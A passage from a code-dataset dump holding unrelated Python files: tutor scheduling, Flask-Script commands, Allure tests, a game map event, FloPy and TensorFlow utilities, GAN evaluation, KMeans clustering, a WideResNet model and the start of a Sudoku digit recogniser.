courseDictionary.values() if not isAlreadyTutoring(course, tutorName, tutorDictionary)])\n\n\ndef addCoursesToTutor(tutorDictionary, courseDictionary, tutorName, courses):\n '''Adding list of courses to a tutorName key in the list of tutors'''\n for course in courses:\n tutorDictionary[tutorName].append(course)\n\ndef getScheduleFileUrl(scheduleFileName):\n '''Getting schedule file url using credentials from the app'''\n return functions.getScheduleUrlFromDrive(scheduleFileName)\n\ndef uploadSettingsToDrive():\n functions.uploadSettingsToDrive()\n\ndef getScheduleDictionary():\n '''Returns a schedule dictionary after reading schedule Excel file'''\n functions.updateScheduleFromDrive()\n excel_file = openpyxl.load_workbook('tutorSchedule.xlsx')\n week_days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n hours = list(idx for idx in range(9, 21)) # Creating a list with possible hours 9 - 20\n\n schedule = dict((day, dict()) for day in week_days)\n\n # Going through the each worksheet in excel file (one week day)\n for day in week_days:\n work_sheet = excel_file.get_sheet_by_name(day)\n\n # Setting a starting point in Excel file\n start_time_row = 4\n start_column = 2\n\n current_time_row = 4\n\n for hour in hours:\n # Creating a list that will hold tutor names in the day dictionary under hour key\n schedule[day][hour] = list()\n\n current_column = 2\n\n # Going through every row and collecting tutor names\n while True:\n current_cell = work_sheet.cell(row = current_time_row, column = current_column)\n\n # if cell is empty add '0' and break out of the loop\n if isinstance(current_cell.value, type(None)):\n schedule[day][hour].append('0')\n break\n else:\n schedule[day][hour].append(str(current_cell.value))\n current_column += 1\n # Outside of the while loop increment current row\n current_time_row += 1\n\n return schedule\n","sub_path":"admin/admin_functions.py","file_name":"admin_functions.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"596790203","text":"from flask_script import Manager\nfrom app import app\nimport sqlite3\nfrom models import User\nmanager = Manager(app)\n\n#python3 manmage.py hello 来执行\n@manager.command\ndef hello():\n\tprint('hello manager')\n\n\n\n#python manage.py hello_world\n@manager.option('-m','--msg',dest='msg_val',default='world')\ndef hello_world(msg_val):\n\tprint ('hello'+msg_val)\n\n@manager.command\ndef init_db():\n\tsql = 'create table user (id INT,name TEXT)'\n\tconn = sqlite3.connect('meng.db')\n\tcursor = conn.cursor()\n\tcursor.execute(sql)\n\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\n@manager.command\ndef save():\n\tuser = User(2,'liang')\n\tuser.save()\n@manager.command\ndef query_all():\n\tusers = User.query()\n\tfor user in users:\n\t\tprint(user)\n\n\nif __name__ == '__main__':\n\tmanager.run()","sub_path":"flaskPractice/flaskScript/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"80608576","text":"import allure\nimport pytest\nimport ddt\nimport json,requests\n\n\n\n@pytest.fixture()\ndef load_data():\n a = 2\n return a\n@allure.description_html(\"\"\"\n

Test with some complicated html description by ZHOUPENGYANG

\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
FirstnameLastnameAge
WilliamSmith50
VasyaJackson94
\n\"\"\")\n\ndef test_html_description(load_data):\n\n assert load_data == 2\n\n@allure.description(\"\"\"\nMultiline test description.\nThat comes from the allure.description decorator.\n\nNothing special about it.\n\"\"\")\ndef test_description_from_decorator():\n assert 42 == int(6 * 7)\n\n\ndef test_unicode_in_docstring_description():\n \"\"\"Unicode in description.\n\n Этот тест проверяет юникод.\n\n 你好伙计.\n \"\"\"\n assert 42 == int(6 * 7)\n@allure.description_html(\"\"\"\n

Zhang Yiling 世界で最も美しい人たち

\n\"\"\")\ndef test_request_api():\n \"\"\"\n HELLO 聪明猪\n \"\"\"\n url = \"U URL\"\n response = requests.request(\"get\",url)\n SYLY_data = json.loads(response.text)\n for x in SYLY_data:\n if x[\"SYL_Y\"] == 23.1259:\n print(x[\"SYL_Y\"])\n else:\n print(\"!=23.1259\")\n # print(\"SUCCESS\")\n # else:\n # print(\"AGAIN!\")\n","sub_path":"allure_case.py","file_name":"allure_case.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595478333","text":"#coding=utf-8\n\n'''\n活动:黑洞探险\n'''\n\nNPC_MAP_POINTS = {\n\t\t70001: ((60,25),(105,22),(101,40),(104,60),(102,80),(53,74),(17,48),(5,59),(13,101),(35,125),(52,103),(74,91),(68,65)),\n\t\t3: ((7,49),(19,73),(23,95),(41,77),(58,77),(75,90),(82,53),(78,16),(49,9),(36,15)),\n}\nMAP_ID = 5002\n\nfrom yuanneng import scheduler_manager\nfrom yuanneng import cfg\nfrom yuanneng.map import callback_manager\nfrom time import *\nfrom yuanneng import utils\nfrom yuanneng.proto import map_pb2\nfrom yuanneng.proto import role_pb2\nfrom yuanneng import mc\nfrom yuanneng.cmd import *\nfrom random import *\n\n\ndef init():\n scheduler_manager.add_hour_scheduler(start, -1)\n global m_map\n from yuanneng.map import map as m_map\n global LEADER_IDX, MEMBER_IDX\n from yuanneng.team import LEADER_IDX, MEMBER_IDX\n\ndef start():\n hour = localtime()[3]\n appear = hour % 2 == 0\n for map_id in NPC_MAP_POINTS:\n if m_map.query_process(map_id) != cfg.gpid:\n continue\n if (map_id, False) not in m_map.map_table:\n if appear:\n callback_manager.regist_map_cb(map_id, add_npc_to_map)\n else:\n callback_manager.remove_map_cb(map_id, add_npc_to_map)\n continue\n map_obj = m_map.map_table[(map_id, False)]\n if appear:\n add_npc_to_map(map_obj)\n else:\n map_obj.clear_heidong_npcs()\n appear = not appear\n\nclass PlayerHeidong(object):\n def add_heidong_count(self, num = 1):\n old_count = self.heidong_count\n self.heidong_count += num\n if old_count < 1 and self.heidong_count >= 1:\n #TODO 添加称号和成就\n pass\n if old_count < 10 and self.heidong_count >= 10:\n #TODO 添加称号和成就\n pass\n\nclass MapHeidong(object):\n ''' 普通地图上的黑洞npc相关处理 '''\n def __init__(self):\n self.heidong_npc = {}\n\n def clear_heidong_npcs(self):\n for gid in self.heidong_npc:\n self.recy_id(gid)\n res = map_pb2.MapRemovedRes()\n res.type = 2\n res.id = gid\n self.tell_room('C04', 1, res)\n self.heidong_npc.clear()\n\n def heidong_check(self, heidong_id, obj):\n if heidong_id not in self.heidong_npc:\n return False\n x, y = self.heidong_npc[heidong_id]\n if utils.get_dis(x, y, obj.x, obj.y) > 15:\n return False\n return True\n\n def remove_heidong(self, id):\n self.recy_id(id)\n res = map_pb2.MapRemovedRes()\n res.type = 2\n res.id = id\n self.tell_room('C04', 1, res)\n del self.heidong_npc[id]\n\n def add_heidong_npcs(self, points):\n res = map_pb2.MapBroadRes()\n for pt in points:\n gid = self.get_available_id()\n self.heidong_npc[gid] = pt\n pb_item = res.items.add()\n pb_item.x, pb_item.y = pt\n pb_item.status = 0\n pb_item.id = gid\n pb_item.type = 2\n pb_item.tid = 50045\n self.tell_room('C01', 1, res)\n\n def build_map_broad_heidong(self, pb_items):\n for heidong_id, (x,y) in self.heidong_npc.iteritems():\n pb_item = pb_items.add()\n pb_item.x, pb_item.y = x, y\n pb_item.status = 0\n pb_item.id = heidong_id\n pb_item.type = 2\n pb_item.tid = 50045\n\ndef add_npc_to_map(map_obj):\n tid = map_obj.tid\n if tid not in NPC_MAP_POINTS:\n return\n points = list(NPC_MAP_POINTS[tid])\n shuffle(points)\n count = randint(5,10)\n map_obj.add_heidong_npcs(points[:count])\n\n@route('J08', require_para = role_pb2.RoleIdReq)\n@cmd_exception_catch()\ndef enter_heidong(obj, data):\n if obj.level < 20:\n return\n npc_id = data.id\n map_obj = obj.map_obj\n if not map_obj.heidong_check(npc_id, obj):\n return\n born = m_map.query_born(MAP_ID)\n obj.lv_arg = (1, obj.level)\n if not obj.team:\n return\n team_id = mc.get_player_team(obj.gid)\n if not team_id:\n return\n team = mc.get_team(team_id)\n if not team:\n return\n #没有已经存在的副本\n team_copy = mc.get_team_copy(team_id)\n if team_copy:\n return\n if obj.gid != team[LEADER_IDX]:\n return\n mate_objs = []\n members = team[MEMBER_IDX]\n all_members = set()\n total_count = 1\n total_lv = obj.level\n for mate in members:\n mate_obj = map_obj.get_obj(mate)\n if not mate_obj or mate_obj.level < 20 or utils.get_dis(obj.x,obj.y,mate_obj.x,mate_obj.y) >= 15:\n continue\n total_count += 1\n total_lv += mate_obj.level\n mate_objs.append(mate_obj)\n all_members.add(mate)\n if total_count < 2:\n return\n from yuanneng.transmit import transmit_to\n map_obj.remove_heidong(npc_id)\n all_members.add(obj.gid)\n team_copy = [MAP_ID, all_members]\n mc.set_team_copy(team_id,team_copy)\n obj.lv_arg = (total_count, total_lv / total_count)\n mc.set_heidong_enter_p(obj.gid, map_obj.tid, obj.x, obj.y)\n transmit_to(obj,MAP_ID,born[0],born[1])\n for mate_obj in mate_objs:\n mate_obj.lv_arg = (total_count, total_lv / total_count)\n mc.set_heidong_enter_p(mate_obj.gid, map_obj.tid, mate_obj.x, mate_obj.y)\n transmit_to(mate_obj,MAP_ID,born[0],born[1])\n\n","sub_path":"yuanneng/activity/heidong.py","file_name":"heidong.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339324685","text":"import numpy as np\nimport flopy.mt3d as mt\n\n\nclass DspAdapter:\n _data = None\n\n def __init__(self, data):\n self._data = data\n\n def validate(self):\n # should be implemented\n # for key in content:\n # do something\n # return some hints\n pass\n\n def is_valid(self):\n # should be implemented\n # for key in content:\n # do something\n # return true or false\n return True\n\n def merge(self):\n default = self.default()\n for key in self._data:\n default[key] = self._data[key]\n return default\n\n def get_package(self, _mt):\n content = self.merge()\n return mt.Mt3dDsp(\n _mt,\n **content\n )\n\n @staticmethod\n def default():\n default = {\n \"al\": 0.01,\n \"trpt\": 0.1,\n \"trpv\": 0.01,\n \"dmcoef\": 1e-09,\n \"extension\": 'dsp',\n \"multiDiff\": False,\n \"unitnumber\": None,\n \"filenames\": None\n }\n return default\n\n @staticmethod\n def read_package(package):\n content = {\n \"al\": package.al.array.tolist(),\n \"trpt\": np.reshape(package.trpt.array, (len(package.trpt.array),)).tolist(),\n \"trpv\": np.reshape(package.trpv.array, (len(package.trpv.array),)).tolist(),\n # \"dmcoef\": package.dmcoef.array.tolist(),\n \"extension\": package.extension[0],\n \"multiDiff\": package.multiDiff,\n \"unitnumber\": package.unit_number[0],\n # \"filenames\": package.filenames\n }\n return content\n","sub_path":"FlopyAdapter/MtPackages/DspAdapter.py","file_name":"DspAdapter.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238091693","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/28 15:31\n# @Author : qiubin\n# @File : test_app.py\n# @Software: PyCharm\n\n\nfrom appium import webdriver\nimport time\ndesired_caps = {\n 'platformName': 'Android',\n # 用真机的时候,这个参数deviceName没什么用,但是还是必须要有这个参数,值的话随便填就行了\n 'deviceName': 'emulator-5554',\n 'platformVersion': '7.1.1',\n 'appPackage': 'com.tencent.mtt.x86',\n 'appActivity': 'com.tencent.mtt.x86.SplashActivity',\n 'noReset': True,\n 'unicodeKeyyboard': True,\n 'resetKeyboard': True,\n 'chromeOptions': {'androidProcess': 'com.tencent.mm:appbrand0'},\n\n}\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\ntime.sleep(60)\ndriver.quit()\n","sub_path":"Day_001/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272892625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 1 09:55:54 2018\n\n@author: glen.alleman\n\"\"\"\n#saved as analysis.pd\n\nimport pandas as pd\n\ndat_europe = pd.read_csv('data/gapminder_gdp_europe.csv', index_col='country')\n\n\ndat_oceania = pd.read_csv('data/gapminder_gdp_oceania.csv', index_col='country')\n\ndat_aisa = pd.read_csv('data/gapminder_gdp_asia.csv', index_col='country')\n\n\n# working with asia data\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466091402","text":"import numpy as np\n\nimport re\n\nstring = \"1010010101011110101001\" #\n\n\nclass node:\n a = 0 # inclusive\n b = 1 # exclusive\n pattern = \"\"\n symbol = \"\"\n repeats = 1\n children = []\n\n symbolType = False\n\n def __init__(self, from_, to_, p, c):\n self.a = from_\n self.b = to_\n self.pattern = p\n self.repeats = c\n self.children = []\n self.symbol = \"\"\n\n def add_child(self, node):\n self.children.append(node)\n\n def set_pattern(self, p):\n self.pattern = p\n\n def get_children(self):\n return self.children\n\n def get_num_children(self):\n return len(self.children)\n\n def print_children(self):\n for i in range(len(self.children)):\n print(self.children[i].pattern + \" \", end='')\n print()\n\n\ndef initialize_nodes(string):\n nodes = []\n for i in range(len(string)):\n nodes.append(node(i, i + 1, string[i:i + 1], 1))\n return [nodes, \"\"]\n\n\ndef get_repeating_pattern_type(node):\n # does a BFS, searching for the pattern which is repeated\n queue = node.get_children()\n while (queue):\n n = queue.pop(0)\n if (n.symbolType):\n return n\n children = n.get_children()\n for i in range(len(children)):\n queue.append(children[i])\n\n\ndef merge_nodes(nodes, mergeStart, mergeEnd, symb):\n pat = \"\"\n # print(\"merging from\"+ str(mergeStart) + \" to \"+ str(mergeEnd))\n n = node(nodes[mergeStart].a, nodes[mergeEnd].b, \"\", mergeEnd - mergeStart)\n # print(\"children1 \" + str(n.getNumChildren()))\n allSameType = True\n for i in range(mergeStart, mergeEnd + 1): # inclusive\n #\t\tif( pat != nodes[i].pattern):#\n #\t\t\tallSameType = False\n pat += nodes[i].pattern\n n.add_child(nodes[i])\n nodes[i].repeats = mergeEnd - mergeStart\n n.set_pattern(pat)\n #\tif(allSameType):\n #\t\tprint(\"all the same type! \\t \\t !!!\")\n #\tn.symbolType = allSameType\n\n n.symbol = symb\n # print(\"children2 \" + str(n.getNumChildren()))\n return n\n\n\ndef merge_t_codes(nodes, string):\n n = len(nodes)\n if (n == 1):\n return\n pat = nodes[-2].pattern\n k = 1\n i = 1\n while ((n - 2) - i >= 0):\n if (nodes[n - 2 - i].pattern == pat):\n k += 1\n else:\n break\n i += 1\n # now we have k, now begin merge from R to L\n newNodes = []\n merges = 0\n mergeStart = 0\n mergeEnd = 0\n merging = False\n ki = 0\n # print(n)\n for i in range(0, n):\n # print(\"i is \"+ str(i))\n if (nodes[i].pattern == pat):\n if (ki < k): # don't merge more than k at a time\n if (merging):\n mergeEnd += 1\n else:\n merging = True\n mergeStart = i\n mergeEnd = i + 1\n ki += 1\n else:\n newNodes.append(merge_nodes(nodes, mergeStart, mergeEnd, pat))\n ki = 0\n merging = False\n else:\n if (merging):\n newNodes.append(merge_nodes(nodes, mergeStart, mergeEnd, pat))\n else:\n n = node(nodes[i].a, nodes[i].b, nodes[i].pattern, nodes[i].repeats)\n n.symbol = pat\n for i in nodes[i].get_children():\n n.add_child(i)\n newNodes.append(n)\n merging = False\n ki = 0\n\n return [newNodes, pat]\n\n\ndef print_nodes(nodes):\n for i in range(len(nodes)):\n print(nodes[i].pattern + \" \", end='')\n print()\n\n\ndef print_t_code_pattern(tcodes, string):\n # does a BFS, searching for the pattern which is repeated\n print(\"printing T code pattern\")\n symbols = tcodes[1]\n queue = tcodes[0][0][0].get_children()\n TCodeComplexity = 0\n a = 1\n symbolIndex = 1\n #\tprint(symbols)\n symbol = symbols[-1 * symbolIndex]\n while (queue):\n if (symbolIndex > len(symbols)):\n print(\" + \" + string[-1:])\n return TCodeComplexity\n symbol = symbols[-1 * symbolIndex]\n a += 1\n n = queue.pop(0)\n if (n.pattern == symbol):\n print(\"(\" + n.pattern + \")\" + \"^\" + str(n.repeats) + \" \", end='')\n symbolIndex += 1\n TCodeComplexity += np.log2(1 + n.repeats)\n continue\n children = n.get_children()\n for i in range(len(children)):\n queue.append(children[i])\n return TCodeComplexity\n\n\ndef t_code_it_up(string):\n n = initialize_nodes(string)\n symbols = []\n print_nodes(n[0])\n while (len(n[0]) > 1):\n n = merge_t_codes(n[0], string)\n print_nodes(n[0])\n symbols.append(n[1])\n print(\"p =\" + str(n[1]))\n print()\n print(symbols)\n return [n, symbols]\n\n\n# n = [list of nodes, pattern] is list of nodes (list of 1 node, really)\n# symbols is list of patterns\n\nif __name__ == '__main__':\n #string = \"0100010101101\"\n string = \"01101101011101\"\n tcodes = t_code_it_up(string)\n\n complexity = print_t_code_pattern(tcodes, string)\n print(\"\\nTCode Complexity =\" + str(complexity))\n print(\"\\n\")\n","sub_path":"Tcode_code/old_TCode/TCodes_2.py","file_name":"TCodes_2.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62572428","text":"'''\r\n导出模型\r\n'''\r\nimport tensorflow as tf\r\nweight = tf.Variable(2,dtype=\"float32\",name=\"weight\")\r\nbias = tf.Variable(1,dtype=\"float32\",name=\"bias\")\r\nx = tf.placeholder(tf.float32,name=\"x\")\r\ny = tf.add(tf.multiply(x, weight),bias,name=\"y\")\r\n\r\ninit = tf.initialize_all_variables()\r\n\r\nsaver = tf.train.Saver()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n print(\"y:\",sess.run(y,feed_dict={x:5.0}))\r\n saver.save(sess, \"../data/model.ckpt\")","sub_path":"tensorflow/model/ExportModel.py","file_name":"ExportModel.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508146058","text":"from edc.map.classes import site_mappers\nfrom edc.dashboard.search.classes import BaseSearcher\n\nfrom .base_search_by_mixin import BaseSearchByMixin\n\n\nclass BaseSearchByGps(BaseSearchByMixin, BaseSearcher):\n\n def __init__(self):\n super(BaseSearchByGps, self).__init__()\n self._mapper = None\n self.set_mapper()\n\n def set_mapper(self):\n mapper_cls = site_mappers.get_registry(self.get_current_community())\n self._mapper = mapper_cls()\n\n def get_mapper(self):\n \"\"\"Returns the mapper instance for this community.\"\"\"\n return self._mapper\n\n def contribute_to_context(self, context):\n context.update({'gps_search_form': self.get_search_form()})\n return context\n\n def get_search_queryset(self, request=None):\n \"\"\"Returns a filtered search model queryset.\"\"\"\n options = {self.get_mapper().map_area_field_attr: self.get_current_community()}\n if request:\n search_attrvalue = request.GET.get(self.get_search_attrname()) # e.g. identifier\n if search_attrvalue:\n options.update({self.get_search_attrname(): search_attrvalue})\n return self.get_search_model_cls().objects.filter(**{self.get_mapper().map_area_field_attr: self.get_current_community()})\n\n def get_items_ordered_by_distance(self, queryset, lat, lon, radius):\n \"\"\"Returns a dictionary of search items and a list of keys in order.\n\n The dictionary keys are the calculated distance from a given point.\n\n The queryset must be from a model that has the following attributes:\n * gps_target_lat\n * gps_target_lon\n * relative_distance\n \"\"\"\n ordered_list_of_keys = []\n items = {}\n for item in queryset:\n distance_from_gps = self.get_mapper().gps_distance_between_points(lat, lon, item.gps_target_lat, item.gps_target_lon, radius)\n if distance_from_gps <= radius:\n while distance_from_gps in ordered_list_of_keys:\n distance_from_gps += .0001 # slightly adjust so no two are the same\n ordered_list_of_keys.append(distance_from_gps)\n item.relative_distance = distance_from_gps\n items.update({distance_from_gps: item})\n ordered_list_of_keys.sort()\n return items, ordered_list_of_keys\n\n def get_search_result(self, request, **kwargs):\n \"\"\"Returns an iterable search_result ordered by distance from a given gps point.\"\"\"\n search_result = []\n gps_form = self.get_search_form(request.POST)\n if gps_form.is_valid():\n radius = gps_form.cleaned_data.get('radius') / 1000\n lat = self.get_mapper().get_gps_lat(gps_form.cleaned_data.get('degrees_s'), float('{0}'.format(gps_form.cleaned_data.get('minutes_s'))))\n lon = self.get_mapper().get_gps_lon(gps_form.cleaned_data.get('degrees_e'), float('{0}'.format(gps_form.cleaned_data.get('minutes_e'))))\n items_as_dct, ordered_list_of_keys = self.get_items_ordered_by_distance(self.get_search_queryset(), lat, lon, radius)\n for distance_from_gps in ordered_list_of_keys:\n search_result.append(items_as_dct[distance_from_gps])\n return search_result\n","sub_path":"apps/bcpp_household/search/base_search_by_gps.py","file_name":"base_search_by_gps.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442711222","text":"import random\r\nimport time\r\nimport mrcfile\r\nimport warnings\r\nfrom PIL import Image\r\nfrom pg_model import *\r\nimport criterion\r\nimport math\r\nfrom skimage.measure import compare_ssim\r\nimport torch.optim as optim\r\nimport torch.backends.cudnn as cudnn\r\nimport torchvision.utils as vutils\r\n\r\nimport torch.utils.data as udata\r\nimport torchvision.datasets as vdatasets\r\nimport torchvision.transforms as transforms\r\nimport argparse\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ntest_noisy_data = mrcfile.open('./data/test_SNR0.05_Gaussian.mrc').data\r\ntest_clean_data = mrcfile.open('./data/test_clean.mrc').data\r\n\r\nresolution_ = 128\r\nlatent_size_ = 2\r\nrgb_channel_ = 1\r\nfmap_base_ = 2 ** 11\r\nfmap_decay_ = 1.0\r\nfmap_max_ = 2 ** 7\r\nis_tanh_ = True\r\nis_sigmoid_ = False\r\nbatch_size = 8\r\nimg_size = 128\r\ng_net = Generator(resolution_, latent_size_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_tanh=is_tanh_).cuda()\r\nd_net = Discriminator(resolution_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_sigmoid=is_sigmoid_).cuda()\r\ne_net = Encoder(resolution_, rgb_channel_,\r\n fmap_base_, fmap_decay_, fmap_max_, is_sigmoid=is_sigmoid_).cuda()\r\nnet_level = 5\r\nnet_status = \"stable\"\r\nnet_alpha = 1\r\ng_net.net_config = [net_level, net_status, net_alpha]\r\ne_net.net_config = [net_level, net_status, net_alpha]\r\nd_net.net_config = [net_level, net_status, net_alpha]\r\nprint(g_net.net_status_)\r\ng_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Gnet_128x128.pth'))\r\nd_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Dnet_128x128.pth'))\r\ne_net.load_state_dict(torch.load('/home/hguaf/MSML/PGGAN/WGANgp_l1/Enet_128x128.pth'))\r\n\r\nMSE = []\r\nPSNR = []\r\nssmi = []\r\nk = 0\r\nfor i in range(int(1500 / batch_size)):\r\n cond = test_noisy_data[i * batch_size: i * batch_size + batch_size, :, :]\r\n img = test_clean_data[i * batch_size: i * batch_size + batch_size, :, :]\r\n k = k + 1\r\n pcond2 = np.reshape(cond, (batch_size, 1, img_size, img_size))\r\n pcond2 = torch.from_numpy(pcond2).cuda()\r\n for t in range(batch_size):\r\n gen_img = g_net(e_net((pcond2)))[t].cpu().detach().numpy()\r\n gen_img = gen_img.reshape((img_size, img_size))\r\n # m = criterion.l1loss(gen_img, img[t])\r\n m = criterion.MSE(gen_img, img[t])\r\n ssmi.append(compare_ssim(gen_img, img[t]))\r\n MSE.append(m)\r\n PSNR.append(10 * math.log10(1 / m))\r\n\r\nplt.imshow(gen_img, cmap='gray')\r\nplt.savefig('1.png')\r\nplt.imshow(img[t], cmap='gray')\r\nplt.savefig('2.png')\r\nprint(np.mean(MSE))\r\nprint(np.mean(ssmi))\r\nprint(np.mean(PSNR))\r\n","sub_path":"pggan_test.py","file_name":"pggan_test.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241922858","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv(r\"C:\\data\\ds\\Airbnb.csv\")\ndf.shape\ndf.head()\n\ncoordinates = df.loc[:,['longitude', 'latitude']]\ncoordinates.shape\n\nplt.scatter(df.loc[:,'longitude'], df.loc[:, 'latitude'])\n\nWCSS = []\n\nfor k in range(1,15):\n kmeans = KMeans(n_clusters=k)\n kmeans.fit(coordinates)\n WCSS.append(kmeans.inertia_)\n \nplt.plot(range(1,15),WCSS)\nplt.xlabel(\"Number of K-Value (Clusters)\")\nplt.ylabel(\"WCSS\")\nplt.grid()\nplt.show()\n\nkmeans = KMeans(n_clusters= 6, max_iter=300, random_state=1)\nclusters = kmeans.fit_predict(coordinates)\nlabels = kmeans.labels_\ncentroids = kmeans.cluster_centers_\n\nh = 0.001 ##dokladnosc\nx_min, x_max = coordinates['longitude'].min(), coordinates['longitude'].max()\ny_min, y_max = coordinates['latitude'].min(), coordinates['latitude'].max()\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h)) \nZ = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])\n\nplt.figure(1, figsize = (10,4))\nplt.clf()\nZ = Z.reshape(xx.shape)\nplt.imshow(Z, interpolation = 'nearest',\n extent=(xx.min(), xx.max(), yy.min(), yy.max()),\n cmap = plt.cm.Pastel2, origin = 'lower')\n\nplt.scatter(x = coordinates['longitude'], y = coordinates['latitude'],\n c = labels, s=100)\n\nplt.scatter(x=centroids[:,0], y=centroids[:,1],\n s=200, c='red')\n\nplt.ylabel('longitude(y)'), plt.xlabel('latitude(x)')\nplt.grid()\nplt.title(\"Ottawa Clustering\")\nplt.show()\n\n","sub_path":"Unsupervised learning - clustering.py","file_name":"Unsupervised learning - clustering.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"486087732","text":"import torch\n\nclass WideBasicBlock(torch.nn.Module):\n def __init__(self, inplanes, outplanes, dropout_rate=0.5, \n stride=1, downsample=None):\n super(WideBasicBlock, self).__init__()\n self.downsample = downsample\n\n self.relu = torch.nn.ReLU(inplace=True)\n\n self.bn1 = torch.nn.BatchNorm2d(inplanes)\n self.conv1 = torch.nn.Conv2d(inplanes, outplanes,\n kernel_size=3, padding=1, stride=1, bias=False)\n\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n\n self.bn2 = torch.nn.BatchNorm2d(outplanes)\n self.conv2 = torch.nn.Conv2d(outplanes, outplanes,\n kernel_size=3, padding=1, stride=stride, bias=True)\n\n def forward(self, x):\n shortcut = x\n\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.dropout(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n shortcut = self.downsample(x)\n out += shortcut\n \n return out\n \n\nclass WideResNet32(torch.nn.Module):\n def __init__(self, depth, widen_factor, dropout_rate, num_classes):\n super(WideResNet32, self).__init__()\n self.inplanes = 16\n\n assert ((depth-4)%6 == 0), 'WideResNet depth should be 6n+4'\n n = (depth - 4) // 6\n k = widen_factor\n\n print('WideResNet %dx%d' % (depth, k))\n nstages = [16, 16*k, 32*k, 64*k]\n\n self.conv1 = torch.nn.Conv2d(3, nstages[0], kernel_size=3, padding=1, \n stride=1, bias=True)\n self.layer1 = self._make_layer(\n WideBasicBlock, nstages[1], n, dropout_rate, stride=1)\n self.layer2 = self._make_layer(\n WideBasicBlock, nstages[2], n, dropout_rate, stride=2)\n self.layer3 = self._make_layer(\n WideBasicBlock, nstages[3], n, dropout_rate, stride=2)\n self.bn = torch.nn.BatchNorm2d(nstages[3], momentum=0.9)\n self.relu = torch.nn.ReLU(inplace=True)\n self.avgpool = torch.nn.AvgPool2d(8)\n self.fc = torch.nn.Linear(nstages[3], num_classes)\n \n def _make_layer(self, block, planes, blocks, dropout_rate, stride):\n strides = [stride] + [1]*(blocks-1)\n layers = []\n for stride in strides:\n downsample = None\n\n if stride != 1 or self.inplanes != planes:\n downsample = torch.nn.Sequential(\n torch.nn.Conv2d(self.inplanes, planes, \n kernel_size=1, stride=stride, bias=True)\n )\n\n layers.append(block(self.inplanes, planes, \n dropout_rate, stride, downsample))\n self.inplanes = planes\n\n return torch.nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n\n out = self.bn(out)\n out = self.relu(out)\n out = self.avgpool(out)\n \n out = out.view(out.size(0), -1)\n out = self.fc(out)\n\n return out","sub_path":"dl/model/wide_resnet.py","file_name":"wide_resnet.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"567100420","text":"# Program uses CNN to recognise handwritten digits from a visual Soduku board\r\n# The digits are semi lexical hence some of them maybe recognized ambiguously\r\n# The conflict caused by ambiguity is resolved using a constraint rules written in Sudoku.py\r\n# The wrong examples are explained using euclidean distance from the pooling layer activations using DistanceUtility.py\r\n# @Author : Briti Gangopadhyay\r\n# @Institution : IIT Kharagpur\r\n\r\nfrom keras.models import model_from_json\r\nimport numpy as np\r\nimport cv2\r\nimport Sudoku as sd\r\nimport DistanceUtility as ds\r\nimport csv\r\nimport os\r\nimport sys\r\nimport copy\r\nimport random as rd\r\nfrom keras import Model\r\nfrom keras.datasets import mnist\r\nos.environ['KMP_WARNINGS'] = 'off'\r\n# For setting random numbers and getting the same result everytime\r\nrd.seed(32)\r\nargumentList = sys.argv\r\n\r\n# global variable suduko board\r\nboard = np.zeros((9, 9))\r\n# dictionary containing all the conflicting pairs\r\nconflict_pairs = {}\r\n# Dictionary to store the confidence of the numbers [(0,1) : 